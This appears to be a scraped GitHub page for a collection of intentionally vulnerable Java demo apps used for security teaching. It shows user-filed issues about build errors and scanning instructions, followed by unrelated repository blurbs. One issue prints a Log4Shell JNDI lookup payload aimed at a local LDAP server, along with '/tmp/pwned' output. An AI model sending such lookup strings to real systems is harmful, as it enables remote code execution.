This is a collection of Java demo apps that are vulnerable in different ways.
It's divided into modules, each one having its own README:
This is a collection of Java demo apps that are vulnerable in different ways.
It's divided into modules, each one having its own README:
The README.md is exact copy of the original project. As README says go to todolist-web-springmvc but there is no directory is provided with this name. Do I need to run the original application to exploit the vulnerability?
For K8s demonstrations, I want to have Terraform configs to:
When using 8u191 in directory/project log4shell-goof, I received the following error when running mvn exec:java from client directory (not server):
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.0.0:java (default-cli) on project log4shell-client: An exception occured while executing the Java class.
[ERROR] Unexpected state.
[ERROR] Make sure to remove /tmp/pwned between runs.
[ERROR] Make sure Server is running.
[ERROR] Make sure you JVM is <= 11.0.1 or 8u191 or 7u201 or 6u211
21:35:34.125 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
21:35:34.128 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!
See above
No response
docker build of log4shell-server failing maven build with:
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] BUILD FAILURE
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] Total time: 9.492 s
#8 11.36 [INFO] Finished at: 2022-01-21T20:23:07Z
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-assembly-plugin:2.2-beta-5:single (default-cli) on project log4shell-server: Error reading assemblies: No assembly descriptors found. -> [Help 1]
#8 11.36 [ERROR]
#8 11.36 [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
#8 11.36 [ERROR] Re-run Maven using the -X switch to enable full debug logging.
#8 11.36 [ERROR]
#8 11.36 [ERROR] For more information about the errors and possible solutions, please read the following articles:
#8 11.36 [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
------
Customers pull down goof, java goof etc all the time. Need instructions that point to the java scanning documentation and also potentially give scanning instructions, like in the java-goof, it requires all-projects or --maven-aggregate-project. While the CLI intelligently does give hints, some customers are very novice on the technical level (i.e. pure security or managers) and need the help (sometimes it's a language barrier).
No response
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.